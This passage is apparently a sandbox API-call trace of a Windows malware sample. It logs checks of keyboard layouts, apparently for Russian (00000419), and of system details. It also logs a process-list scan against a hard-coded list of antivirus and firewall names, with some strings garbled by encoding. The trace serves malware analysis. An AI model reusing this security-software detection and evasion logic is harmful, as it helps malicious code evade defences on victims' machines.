[0060.204] wsprintfW (in: param_1=0x490000, param_2="%d" | out: param_1="1") returned 1 [0060.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.204] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x134) returned 0x0 [0060.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.204] RegQueryValueExW (in: hKey=0x134, lpValueName="1", lpReserved=0x0, lpType=0x0, lpData=0x49000e, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x49000e*=0x30, lpcbData=0x19f79c*=0x12) returned 0x0 [0060.204] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.204] RegCloseKey (hKey=0x134) returned 0x0 [0060.204] lstrcmpiW (lpString1="00000409", lpString2="00000419") returned -1 [0060.206] wsprintfW (in: param_1=0x490000, param_2="%d" | out: param_1="2") returned 1 [0060.206] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.207] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Keyboard Layout\\Preload", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x138) returned 0x0 [0060.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.207] RegQueryValueExW (in: hKey=0x138, lpValueName="2", lpReserved=0x0, lpType=0x0, lpData=0x49000e, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x49000e*=0x30, lpcbData=0x19f79c*=0x80) returned 0x2 [0060.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.207] RegCloseKey (hKey=0x138) returned 0x0 [0060.207] wsprintfW (in: param_1=0x4a0000, param_2="0" | out: param_1="0") returned 1 [0060.207] VirtualFree (lpAddress=0x490000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0060.207] VirtualAlloc (lpAddress=0x0, dwSize=0x82, flAllocationType=0x3000, flProtect=0x4) returned 0x490000 [0060.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.207] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion", ulOptions=0x0, samDesired=0x20019, phkResult=0x19f7ac | out: phkResult=0x19f7ac*=0x138) returned 0x0 [0060.207] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.208] RegQueryValueExW (in: hKey=0x138, lpValueName="productName", lpReserved=0x0, lpType=0x0, lpData=0x490000, lpcbData=0x19f79c*=0x80 | out: lpType=0x0, lpData=0x490000*=0x57, lpcbData=0x19f79c*=0x1e) returned 0x0 [0060.208] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0060.208] RegCloseKey (hKey=0x138) returned 0x0 [0060.208] GetNativeSystemInfo (in: lpSystemInfo=0x19f84c | out: lpSystemInfo=0x19f84c*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0060.208] VirtualAlloc (lpAddress=0x0, dwSize=0x40, flAllocationType=0x3000, flProtect=0x4) returned 0x1dd0000 [0060.208] wsprintfW (in: param_1=0x1dd0000, param_2="x64" | out: param_1="x64") returned 3 [0060.208] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x1de0000 [0060.208] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x3000, flProtect=0x4) returned 0x1df0000 [0060.209] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x138 [0060.214] Process32First (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0060.214] lstrcmpiW (lpString1="AVP.EXE", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="ekrn.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="avgnt.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="ashDisp.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="Mcshield.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="avengine.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="cmdagent.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="smc.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="persfw.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="pccpfw.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="cfp.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] lstrcmpiW (lpString1="msmpeng.exe", lpString2="卛獹整牐捯獥嵳") returned -1 [0060.214] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x66, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0060.215] GetLastError () returned 0x0 [0060.215] lstrcmpiW (lpString1="AVP.EXE", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="ekrn.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="avgnt.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="ashDisp.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="Mcshield.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="avengine.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="cmdagent.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="smc.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="persfw.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="pccpfw.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="cfp.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] lstrcmpiW (lpString1="msmpeng.exe", lpString2="祓瑳浥 牐捯獥嵳") returned -1 [0060.215] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x108, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0060.216] GetLastError () returned 0x0 [0060.216] lstrcmpiW (lpString1="AVP.EXE", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="ekrn.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="avgnt.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="ashDisp.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="Mcshield.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="avengine.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="cmdagent.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="smc.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="persfw.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="pccpfw.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="cfp.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] lstrcmpiW (lpString1="msmpeng.exe", lpString2="浳獳攮數爀捯獥嵳") returned -1 [0060.216] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x154, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.217] GetLastError () returned 0x0 [0060.217] lstrcmpiW (lpString1="AVP.EXE", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="ekrn.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="avgnt.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="ashDisp.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="Mcshield.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="avengine.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="cmdagent.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="smc.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="persfw.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="pccpfw.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="cfp.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] lstrcmpiW (lpString1="msmpeng.exe", lpString2="獣獲⹳硥e捯獥嵳") returned -1 [0060.217] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x194, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x14c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0060.218] GetLastError () returned 0x0 [0060.218] lstrcmpiW (lpString1="AVP.EXE", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="ekrn.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="avgnt.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="ashDisp.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="Mcshield.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="avengine.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="cmdagent.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="smc.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="persfw.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="pccpfw.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="cfp.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="msmpeng.exe", lpString2="楷楮楮⹴硥e獥嵳") returned -1 [0060.218] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x19c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0060.218] GetLastError () returned 0x0 [0060.218] lstrcmpiW (lpString1="AVP.EXE", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="ekrn.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.218] lstrcmpiW (lpString1="avgnt.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="ashDisp.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="Mcshield.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="avengine.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="cmdagent.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="smc.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="persfw.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="pccpfw.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="cfp.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] lstrcmpiW (lpString1="msmpeng.exe", lpString2="獣獲⹳硥ee獥嵳") returned -1 [0060.219] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x18c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0060.219] GetLastError () returned 0x0 [0060.219] lstrcmpiW (lpString1="AVP.EXE", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="ekrn.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="avgnt.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="ashDisp.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="Mcshield.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="avengine.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="cmdagent.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="smc.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="persfw.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.219] lstrcmpiW (lpString1="pccpfw.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="cfp.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="msmpeng.exe", lpString2="楷汮杯湯攮數猀嵳") returned -1 [0060.220] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0060.220] GetLastError () returned 0x0 [0060.220] lstrcmpiW (lpString1="AVP.EXE", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="ekrn.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="avgnt.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="ashDisp.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="Mcshield.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="avengine.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="cmdagent.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="smc.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="persfw.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="pccpfw.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="cfp.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] lstrcmpiW (lpString1="msmpeng.exe", lpString2="敳癲捩獥攮數猀嵳") returned -1 [0060.220] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x194, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0060.221] GetLastError () returned 0x0 [0060.221] lstrcmpiW (lpString1="AVP.EXE", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="ekrn.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="avgnt.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="ashDisp.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="Mcshield.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="avengine.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="cmdagent.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="smc.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="persfw.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="pccpfw.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="cfp.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] lstrcmpiW (lpString1="msmpeng.exe", lpString2="獬獡⹳硥e數猀嵳") returned -1 [0060.221] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x23c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.222] GetLastError () returned 0x0 [0060.222] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.222] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.223] GetLastError () returned 0x0 [0060.223] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.223] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0060.224] GetLastError () returned 0x0 [0060.224] lstrcmpiW (lpString1="AVP.EXE", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="ekrn.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="avgnt.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="ashDisp.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="Mcshield.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="avengine.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="cmdagent.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="smc.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="persfw.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="pccpfw.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="cfp.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] lstrcmpiW (lpString1="msmpeng.exe", lpString2="睤⹭硥e硥e猀嵳") returned -1 [0060.224] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x58, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.225] GetLastError () returned 0x0 [0060.225] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="ashDisp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="NortonAntiBot.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="Mcshield.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="avengine.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="cmdagent.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="smc.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="persfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="pccpfw.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="fsguiexe.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="cfp.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] lstrcmpiW (lpString1="msmpeng.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.225] Process32Next (in: hSnapshot=0x138, lppe=0x1df0000 | out: lppe=0x1df0000*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x1e4, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0060.226] GetLastError () returned 0x0 [0060.226] lstrcmpiW (lpString1="AVP.EXE", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="ekrn.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="avgnt.exe", lpString2="癳档獯⹴硥e猀嵳") returned -1 [0060.226] lstrcmpiW (lpString1="ashDisp.exe", 